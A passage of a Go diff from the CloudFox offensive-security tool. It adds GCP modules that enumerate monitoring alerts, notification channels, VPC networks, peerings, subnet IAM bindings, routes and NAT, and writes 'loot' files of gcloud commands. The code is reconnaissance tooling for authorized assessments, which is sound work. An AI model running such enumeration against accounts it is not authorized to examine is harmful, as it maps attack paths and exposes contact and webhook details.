CHECK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe uptime check:\n"+ + "gcloud alpha monitoring uptime describe %s --project=%s\n\n", + u.DisplayName, + u.ProjectID, + extractResourceName(u.Name), u.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *MonitoringAlertsModule) getPoliciesHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Policy Name", + "Enabled", + "Condition Name", + "Metric Type", + "Comparison", + "Threshold", + "Duration", + "Notification Channels", + } +} + +func (m *MonitoringAlertsModule) getChannelsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Channel Name", + "Type", + "Enabled", + "Verified", + "Destination", + } +} + +func (m *MonitoringAlertsModule) getUptimeHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Check Name", + "Enabled", + "Host", + "Protocol", + "Port", + "Path", + "Period", + "Timeout", + "SSL Enabled", + } +} + +func (m *MonitoringAlertsModule) policiesToTableBody(policies []AlertPolicy, channelNameMap map[string]string) [][]string { + var body [][]string + for _, p := range policies { + // Resolve notification channel names + var channelNames []string + for _, channelRef := range p.NotificationChannels { + if name, ok := channelNameMap[channelRef]; ok { + channelNames = append(channelNames, name) + } else { + parts := strings.Split(channelRef, "/") + if len(parts) > 0 { + channelNames = append(channelNames, parts[len(parts)-1]) + } + } + } + notificationChannelsStr := "-" + if len(channelNames) > 0 { + notificationChannelsStr = strings.Join(channelNames, ", ") + } + + if len(p.Conditions) > 0 { + for _, cond := range p.Conditions { + metricType := cond.MetricType + if metricType == "" { + metricType = "-" + } + comparison := cond.Comparison + if comparison == "" { + comparison = "-" + } + threshold := "-" + if cond.ThresholdValue != 0 { + threshold = fmt.Sprintf("%.2f", cond.ThresholdValue) + } + duration := cond.Duration + if duration == "" { + duration = "-" + } + + body = append(body, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + shared.BoolToYesNo(p.Enabled), + cond.DisplayName, + metricType, + comparison, + threshold, + duration, + notificationChannelsStr, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + shared.BoolToYesNo(p.Enabled), + "-", + "-", + "-", + "-", + "-", + notificationChannelsStr, + }) + } + } + return body +} + +func (m *MonitoringAlertsModule) channelsToTableBody(channels []NotificationChannel) [][]string { + var body [][]string + for _, c := range channels { + destination := extractChannelDestination(c.Type, c.Labels) + body = append(body, []string{ + m.GetProjectName(c.ProjectID), + c.ProjectID, + c.DisplayName, + c.Type, + shared.BoolToYesNo(c.Enabled), + shared.BoolToYesNo(c.Verified), + destination, + }) + } + return body +} + +func (m *MonitoringAlertsModule) uptimeToTableBody(checks []UptimeCheck) [][]string { + var body [][]string + for _, u := range checks { + host := u.MonitoredHost + if host == "" { + host = "-" + } + path := u.Path + if path == "" { + path = "-" + } + timeout := u.Timeout + if timeout == "" { + timeout = "-" + } + + body = append(body, []string{ + m.GetProjectName(u.ProjectID), + u.ProjectID, + u.DisplayName, + shared.BoolToYesNo(u.Enabled), + host, + u.Protocol, + fmt.Sprintf("%d", u.Port), + path, + u.Period, + timeout, + shared.BoolToYesNo(u.SSLEnabled), + }) + } + return body +} + +func (m *MonitoringAlertsModule) buildTablesForProject(projectID string, channelNameMap map[string]string) []internal.TableFile { + var tableFiles []internal.TableFile + + if policies, ok := m.ProjectAlertPolicies[projectID]; ok && len(policies) > 0 { + sort.Slice(policies, func(i, j int) bool { + return policies[i].DisplayName < policies[j].DisplayName + }) + tableFiles = append(tableFiles, internal.TableFile{ + Name: "alerting-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(policies, channelNameMap), + }) + for _, p := range policies { + m.addPolicyToLoot(projectID, p) + } + } + + if channels, ok := m.ProjectNotificationChannels[projectID]; ok && len(channels) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notification-channels", + Header: m.getChannelsHeader(), + Body: m.channelsToTableBody(channels), + }) + for _, c := range channels { + m.addChannelToLoot(projectID, c) + } + } + + if checks, ok := m.ProjectUptimeChecks[projectID]; ok && len(checks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "uptime-checks", + Header: m.getUptimeHeader(), + Body: m.uptimeToTableBody(checks), + }) + for _, u := range checks { + m.addUptimeCheckToLoot(projectID, u) + } + } + + return tableFiles +} + +func (m *MonitoringAlertsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build notification channel name map + channelNameMap := make(map[string]string) + for _, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + channelNameMap[c.Name] = c.DisplayName + } + } + + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectAlertPolicies { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectNotificationChannels { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectUptimeChecks { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID, channelNameMap) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = MonitoringAlertsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + } +} + +func (m *MonitoringAlertsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + // Build notification channel name map + channelNameMap := make(map[string]string) + for _, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + channelNameMap[c.Name] = c.DisplayName + } + } + + allPolicies := m.getAllAlertPolicies() + allChannels := m.getAllNotificationChannels() + allChecks := m.getAllUptimeChecks() + + sort.Slice(allPolicies, func(i, j int) bool { + return allPolicies[i].DisplayName < allPolicies[j].DisplayName + }) + + var tables []internal.TableFile + + if len(allPolicies) > 0 { + tables = append(tables, internal.TableFile{ + Name: "alerting-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(allPolicies, channelNameMap), + }) + } + + if len(allChannels) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notification-channels", + Header: m.getChannelsHeader(), + Body: m.channelsToTableBody(allChannels), + }) + } + + if len(allChecks) > 0 { + tables = append(tables, internal.TableFile{ + Name: "uptime-checks", + Header: m.getUptimeHeader(), + Body: m.uptimeToTableBody(allChecks), + }) + } + + // Populate loot for flat output + for projectID, policies := range m.ProjectAlertPolicies { + for _, p := range policies { + m.addPolicyToLoot(projectID, p) + } + } + for projectID, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + m.addChannelToLoot(projectID, c) + } + } + for projectID, checks := range m.ProjectUptimeChecks { + for _, u := range checks { + m.addUptimeCheckToLoot(projectID, u) + } + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := MonitoringAlertsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// extractChannelDestination extracts the destination info from channel labels +func extractChannelDestination(channelType string, labels map[string]string) string { + if labels == nil { + return "-" + } + + switch channelType { + case "email": + if email, ok := labels["email_address"]; ok { + return email + } + case "slack": + if channel, ok := labels["channel_name"]; ok { + return channel + } + case "pagerduty": + if key, ok := labels["service_key"]; ok { + // Truncate service key for display + if len(key) > 12 { + return key[:12] + "..." + } + return key + } + case "webhook_tokenauth", "webhook_basicauth": + if url, ok := labels["url"]; ok { + return url + } + case "pubsub": + if topic, ok := labels["topic"]; ok { + return topic + } + case "sms": + if number, ok := labels["number"]; ok { + return number + } + } + + // Try common label keys + for _, key := range []string{"url", "address", "endpoint", "target"} { + if val, ok := labels[key]; ok { + return val + } + } + + return "-" +} diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go new file mode 100644 index 00000000..7b0bd7f7 --- /dev/null +++ b/gcp/commands/networktopology.go @@ -0,0 +1,1756 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" +) + +// Module name constant +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +var GCPNetworkTopologyCommand = &cobra.Command{ + Use: GCP_NETWORKTOPOLOGY_MODULE_NAME, + Aliases: []string{"topology", "network-map", "vpc-topology"}, + Short: "Visualize VPC network topology, peering relationships, and trust boundaries", + Long: `Analyze and visualize VPC network topology, peering relationships, and trust boundaries. + +Features: +- Maps all VPC networks and their subnets +- Identifies VPC peering relationships +- Detects Shared VPC configurations +- Analyzes VPC Service Controls perimeters +- Maps Cloud NAT and Private Google Access +- Identifies potential trust boundary issues +- Detects cross-project network access paths + +Requires appropriate IAM permissions: +- roles/compute.networkViewer +- roles/compute.viewer`, + Run: runGCPNetworkTopologyCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type VPCNetwork struct { + Name string + ProjectID string + SelfLink string + Description string + RoutingMode string + AutoCreateSubnets bool + SubnetCount int + PeeringCount int + IsSharedVPC bool + SharedVPCRole string // "host" or "service" + SharedVPCHost string + MTU int64 + CreationTimestamp string + FirewallRuleCount int + PrivateGoogleAcces bool +} + +type Subnet struct { + Name string + ProjectID string + Network string + Region string + IPCIDRRange string + SecondaryRanges []string + PrivateIPGoogleAccess bool + FlowLogsEnabled bool + Purpose string + Role string + StackType string + IAMBindings []SubnetIAMBinding +} + +type SubnetIAMBinding struct { + Role string + Member string +} + +type VPCPeering struct { + Name string + Network string + PeerNetwork string + State string + StateDetails string + ExportCustomRoute bool + ImportCustomRoute bool + ExportSubnetRoute bool + ImportSubnetRoute bool + ProjectID string + PeerProjectID string + AutoCreateRoutes bool +} + +type SharedVPCConfig struct { + HostProject string + ServiceProjects []string + SharedSubnets []string + SharedNetworks []string +} + +type CloudNATConfig struct { + Name string + ProjectID string + Region string + Network string + Subnets []string + NATIPAddresses []string + MinPortsPerVM int64 + SourceSubnetworkType string + EnableLogging bool +} + + +type NetworkRoute struct { + Name string + ProjectID string + Network string + DestRange string + NextHop string + NextHopType string + Priority int64 + Tags []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type NetworkTopologyModule struct { + gcpinternal.BaseGCPModule + + ProjectNetworks map[string][]VPCNetwork // projectID -> networks + ProjectSubnets map[string][]Subnet // projectID -> subnets + ProjectPeerings map[string][]VPCPeering // projectID -> peerings + ProjectNATs map[string][]CloudNATConfig // projectID -> NATs + ProjectRoutes map[string][]NetworkRoute // projectID -> routes + SharedVPCs map[string]*SharedVPCConfig // hostProjectID -> config + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type NetworkTopologyOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NetworkTopologyOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NetworkTopologyOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPNetworkTopologyCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_NETWORKTOPOLOGY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &NetworkTopologyModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectNetworks: make(map[string][]VPCNetwork), + ProjectSubnets: make(map[string][]Subnet), + ProjectPeerings: make(map[string][]VPCPeering), + ProjectNATs: make(map[string][]CloudNATConfig), + ProjectRoutes: make(map[string][]NetworkRoute), + SharedVPCs: make(map[string]*SharedVPCConfig), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *NetworkTopologyModule) Execute(ctx context.Context, logger internal.Logger) { + // Create Compute client + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, logger) + }(projectID) + } + wg.Wait() + + // Check results + allNetworks := m.getAllNetworks() + if len(allNetworks) == 0 { + logger.InfoM("No VPC networks found", GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allNATs := m.getAllNATs() + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d Cloud NAT(s)", + len(allNetworks), len(allSubnets), len(allPeerings), len(allNATs)), GCP_NETWORKTOPOLOGY_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *NetworkTopologyModule) getAllNetworks() []VPCNetwork { + var all []VPCNetwork + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +func (m *NetworkTopologyModule) getAllSubnets() []Subnet { + var all []Subnet + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +func (m *NetworkTopologyModule) getAllPeerings() []VPCPeering { + var all []VPCPeering + for _, peerings := range m.ProjectPeerings { + all = append(all, peerings...) + } + return all +} + +func (m *NetworkTopologyModule) getAllNATs() []CloudNATConfig { + var all []CloudNATConfig + for _, nats := range m.ProjectNATs { + all = append(all, nats...) + } + return all +} + +func (m *NetworkTopologyModule) getAllRoutes() []NetworkRoute { + var all []NetworkRoute + for _, routes := range m.ProjectRoutes { + all = append(all, routes...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *NetworkTopologyModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks for project: %s", projectID), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["network-topology-commands"] = &internal.LootFile{ + Name: "network-topology-commands", + Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: vpcnetworks-commands for quick enumeration and cross-project peering\n\n", + } + } + m.mu.Unlock() + + // List networks + m.enumerateNetworks(ctx, projectID, computeService, logger) + + // List subnets + m.enumerateSubnets(ctx, projectID, computeService, logger) + + // List routes + m.enumerateRoutes(ctx, projectID, computeService, logger) + + // List Cloud NAT + m.enumerateCloudNAT(ctx, projectID, computeService, logger) +} + +func (m *NetworkTopologyModule) enumerateNetworks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Networks.List(projectID) + err := req.Pages(ctx, func(page *compute.NetworkList) error { + for _, network := range page.Items { + vpc := VPCNetwork{ + Name: network.Name, + ProjectID: projectID, + SelfLink: network.SelfLink, + Description: network.Description, + RoutingMode: func() string { + if network.RoutingConfig != nil { + return network.RoutingConfig.RoutingMode + } + return "" + }(), + AutoCreateSubnets: network.AutoCreateSubnetworks, + MTU: network.Mtu, + CreationTimestamp: network.CreationTimestamp, + SubnetCount: len(network.Subnetworks), + } + + // Check for peerings + for _, peering := range network.Peerings { + vpc.PeeringCount++ + + peeringRecord := VPCPeering{ + Name: peering.Name, + Network: network.SelfLink, + PeerNetwork: peering.Network, + State: peering.State, + StateDetails: peering.StateDetails, + ExportCustomRoute: peering.ExportCustomRoutes, + ImportCustomRoute: peering.ImportCustomRoutes, + ExportSubnetRoute: peering.ExportSubnetRoutesWithPublicIp, + ImportSubnetRoute: peering.ImportSubnetRoutesWithPublicIp, + ProjectID: projectID, + AutoCreateRoutes: peering.AutoCreateRoutes, + } + + // Extract peer project ID from peer network URL + peeringRecord.PeerProjectID = m.extractProjectFromURL(peering.Network) + + m.mu.Lock() + m.ProjectPeerings[projectID] = append(m.ProjectPeerings[projectID], peeringRecord) + m.mu.Unlock() + } + + m.mu.Lock() + m.ProjectNetworks[projectID] = append(m.ProjectNetworks[projectID], vpc) + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list networks in project %s", projectID)) + } + + // Check for Shared VPC host project + m.checkSharedVPCHost(ctx, projectID, computeService, logger) +} + +func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Subnetworks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnetList := range page.Items { + if subnetList.Subnetworks == nil { + continue + } + regionName := m.extractRegionFromURL(region) + for _, subnet := range subnetList.Subnetworks { + subnetRecord := Subnet{ + Name: subnet.Name, + ProjectID: projectID, + Network: subnet.Network, + Region: regionName, + IPCIDRRange: subnet.IpCidrRange, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + Role: subnet.Role, + StackType: subnet.StackType, + } + + // Check for flow logs + if subnet.LogConfig != nil { + subnetRecord.FlowLogsEnabled = subnet.LogConfig.Enable + } + + // Secondary ranges + for _, sr := range subnet.SecondaryIpRanges { + subnetRecord.SecondaryRanges = append(subnetRecord.SecondaryRanges, + fmt.Sprintf("%s:%s", sr.RangeName, sr.IpCidrRange)) + } + + // Get IAM bindings for the subnet + subnetRecord.IAMBindings = m.getSubnetIAMBindings(ctx, computeService, projectID, regionName, subnet.Name) + + m.mu.Lock() + m.ProjectSubnets[projectID] = append(m.ProjectSubnets[projectID], subnetRecord) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list subnets in project %s", projectID)) + } +} + +// getSubnetIAMBindings retrieves IAM bindings for a subnet +func (m *NetworkTopologyModule) getSubnetIAMBindings(ctx context.Context, computeService *compute.Service, projectID, region, subnetName string) []SubnetIAMBinding { + policy, err := computeService.Subnetworks.GetIamPolicy(projectID, region, subnetName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []SubnetIAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, SubnetIAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +func (m *NetworkTopologyModule) enumerateRoutes(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Routes.List(projectID) + err := req.Pages(ctx, func(page *compute.RouteList) error { + for _, route := range page.Items { + routeRecord := NetworkRoute{ + Name: route.Name, + ProjectID: projectID, + Network: route.Network, + DestRange: route.DestRange, + Priority: route.Priority, + Tags: route.Tags, + } + + // Determine next hop type + switch { + case route.NextHopGateway != "": + routeRecord.NextHopType = "gateway" + routeRecord.NextHop = route.NextHopGateway + case route.NextHopInstance != "": + routeRecord.NextHopType = "instance" + routeRecord.NextHop = route.NextHopInstance + case route.NextHopIp != "": + routeRecord.NextHopType = "ip" + routeRecord.NextHop = route.NextHopIp + case route.NextHopNetwork != "": + routeRecord.NextHopType = "network" + routeRecord.NextHop = route.NextHopNetwork + case route.NextHopPeering != "": + routeRecord.NextHopType = "peering" + routeRecord.NextHop = route.NextHopPeering + case route.NextHopIlb != "": + routeRecord.NextHopType = "ilb" + routeRecord.NextHop = route.NextHopIlb + case route.NextHopVpnTunnel != "": + routeRecord.NextHopType = "vpn" + routeRecord.NextHop = route.NextHopVpnTunnel + } + + m.mu.Lock() + m.ProjectRoutes[projectID] = append(m.ProjectRoutes[projectID], routeRecord) + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list routes in project %s", projectID)) + } +} + +func (m *NetworkTopologyModule) enumerateCloudNAT(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // List routers to find NAT configurations + req := computeService.Routers.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.RouterAggregatedList) error { + for region, routerList := range page.Items { + if routerList.Routers == nil { + continue + } + for _, router := range routerList.Routers { + for _, nat := range router.Nats { + natRecord := CloudNATConfig{ + Name: nat.Name, + ProjectID: projectID, + Region: m.extractRegionFromURL(region), + Network: router.Network, + MinPortsPerVM: nat.MinPortsPerVm, + SourceSubnetworkType: nat.SourceSubnetworkIpRangesToNat, + } + + // NAT IP addresses + for _, natIP := range nat.NatIps { + natRecord.NATIPAddresses = append(natRecord.NATIPAddresses, natIP) + } + + // Subnets using this NAT + for _, subnet := range nat.Subnetworks { + natRecord.Subnets = append(natRecord.Subnets, subnet.Name) + } + + // Logging + if nat.LogConfig != nil { + natRecord.EnableLogging = nat.LogConfig.Enable + } + + m.mu.Lock() + m.ProjectNATs[projectID] = append(m.ProjectNATs[projectID], natRecord) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list Cloud NAT in project %s", projectID)) + } +} + +func (m *NetworkTopologyModule) checkSharedVPCHost(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Check if project is a Shared VPC host + project, err := computeService.Projects.Get(projectID).Do() + if err != nil { + return + } + + if project.XpnProjectStatus == "HOST" { + m.mu.Lock() + m.SharedVPCs[projectID] = &SharedVPCConfig{ + HostProject: projectID, + ServiceProjects: []string{}, + SharedSubnets: []string{}, + SharedNetworks: []string{}, + } + m.mu.Unlock() + + // List service projects + xpnReq := computeService.Projects.GetXpnResources(projectID) + err := xpnReq.Pages(ctx, func(page *compute.ProjectsGetXpnResources) error { + for _, resource := range page.Resources { + if resource.Type == "PROJECT" { + m.mu.Lock() + m.SharedVPCs[projectID].ServiceProjects = append( + m.SharedVPCs[projectID].ServiceProjects, resource.Id) + m.mu.Unlock() + } + } + return nil + }) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list XPN resources in project %s", projectID)) + } + + // Mark host networks + m.mu.Lock() + if networks, ok := m.ProjectNetworks[projectID]; ok { + for i := range networks { + networks[i].IsSharedVPC = true + networks[i].SharedVPCRole = "host" + } + m.ProjectNetworks[projectID] = networks + } + m.mu.Unlock() + } +} + + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *NetworkTopologyModule) extractProjectFromURL(url string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + if strings.Contains(url, "projects/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *NetworkTopologyModule) extractNetworkName(url string) string { + // Extract network name from full URL + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *NetworkTopologyModule) extractRegionFromURL(url string) string { + // Extract region from URL like regions/us-central1 + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +// ------------------------------ +// ASCII Network Diagram Generator +// ------------------------------ + +// generateASCIIDiagram creates an ASCII visualization of the network topology +func (m *NetworkTopologyModule) generateASCIIDiagram() string { + var sb strings.Builder + + // Header + sb.WriteString(m.drawBox("GCP NETWORK TOPOLOGY MAP - Generated by CloudFox", 90)) + sb.WriteString("\n") + + // Get all data + allNetworks := m.getAllNetworks() + allPeerings := m.getAllPeerings() + + // Group networks by project + networksByProject := make(map[string][]VPCNetwork) + for _, n := range allNetworks { + networksByProject[n.ProjectID] = append(networksByProject[n.ProjectID], n) + } + + // Group subnets by project and network + subnetsByNetwork := make(map[string][]Subnet) // key: "projectID/networkName" + for _, subnets := range m.ProjectSubnets { + for _, s := range subnets { + networkName := m.extractNetworkName(s.Network) + key := s.ProjectID + "/" + networkName + subnetsByNetwork[key] = append(subnetsByNetwork[key], s) + } + } + + // Group NATs by project and network + natsByNetwork := make(map[string][]CloudNATConfig) // key: "projectID/networkName" + for _, nats := range m.ProjectNATs { + for _, nat := range nats { + networkName := m.extractNetworkName(nat.Network) + key := nat.ProjectID + "/" + networkName + natsByNetwork[key] = append(natsByNetwork[key], nat) + } + } + + // Build peering map for quick lookup + peeringMap := make(map[string][]VPCPeering) // key: "projectID/networkName" + for _, p := range allPeerings { + networkName := m.extractNetworkName(p.Network) + key := p.ProjectID + "/" + networkName + peeringMap[key] = append(peeringMap[key], p) + } + + // Sort projects for consistent output + var projectIDs []string + for projectID := range networksByProject { + projectIDs = append(projectIDs, projectID) + } + sort.Strings(projectIDs) + + // Draw each project + for _, projectID := range projectIDs { + networks := networksByProject[projectID] + sb.WriteString(m.drawProjectSection(projectID, networks, subnetsByNetwork, natsByNetwork, peeringMap)) + sb.WriteString("\n") + } + + // Draw Shared VPC relationships if any + if len(m.SharedVPCs) > 0 { + sb.WriteString(m.drawSharedVPCSection()) + sb.WriteString("\n") + } + + // Draw VPC Peering summary + if len(allPeerings) > 0 { + sb.WriteString(m.drawPeeringSummary(allPeerings)) + sb.WriteString("\n") + } + + // Legend + sb.WriteString(m.drawLegend()) + + return sb.String() +} + +// drawBox draws a simple box with centered title +func (m *NetworkTopologyModule) drawBox(title string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line (centered) + padding := (width - 4 - len(title)) / 2 + if padding < 0 { + padding = 0 + } + sb.WriteString("│ ") + sb.WriteString(strings.Repeat(" ", padding)) + sb.WriteString(title) + sb.WriteString(strings.Repeat(" ", width-4-padding-len(title))) + sb.WriteString(" │\n") + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawProjectSection draws the network topology for a single project +func (m *NetworkTopologyModule) drawProjectSection(projectID string, networks []VPCNetwork, + subnetsByNetwork map[string][]Subnet, natsByNetwork map[string][]CloudNATConfig, + peeringMap map[string][]VPCPeering) string { + + var sb strings.Builder + width := 90 + + projectName := m.GetProjectName(projectID) + projectTitle := fmt.Sprintf("PROJECT: %s", projectID) + if projectName != "" && projectName != projectID { + projectTitle = fmt.Sprintf("PROJECT: %s (%s)", projectID, projectName) + } + + // Project header + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, projectTitle)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Sort networks + sort.Slice(networks, func(i, j int) bool { + return networks[i].Name < networks[j].Name + }) + + // Draw each VPC network + for _, network := range networks { + sb.WriteString(m.drawVPCNetwork(network, subnetsByNetwork, natsByNetwork, peeringMap, width)) + } + + // Project footer + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawVPCNetwork draws a single VPC network with its subnets +func (m *NetworkTopologyModule) drawVPCNetwork(network VPCNetwork, + subnetsByNetwork map[string][]Subnet, natsByNetwork map[string][]CloudNATConfig, + peeringMap map[string][]VPCPeering, outerWidth int) string { + + var sb strings.Builder + innerWidth := outerWidth - 6 + + // VPC header with attributes + vpcTitle := fmt.Sprintf("VPC: %s", network.Name) + vpcAttrs := fmt.Sprintf("(%s routing, MTU: %d)", network.RoutingMode, network.MTU) + + // Add Shared VPC indicator + sharedVPCLabel := "" + if network.IsSharedVPC { + sharedVPCLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole)) + } + + // Peering indicator + peeringLabel := "" + if network.PeeringCount > 0 { + peeringLabel = fmt.Sprintf(" [%d PEERING(s)]", network.PeeringCount) + } + + sb.WriteString("│ │\n") + sb.WriteString("│ ┌") + 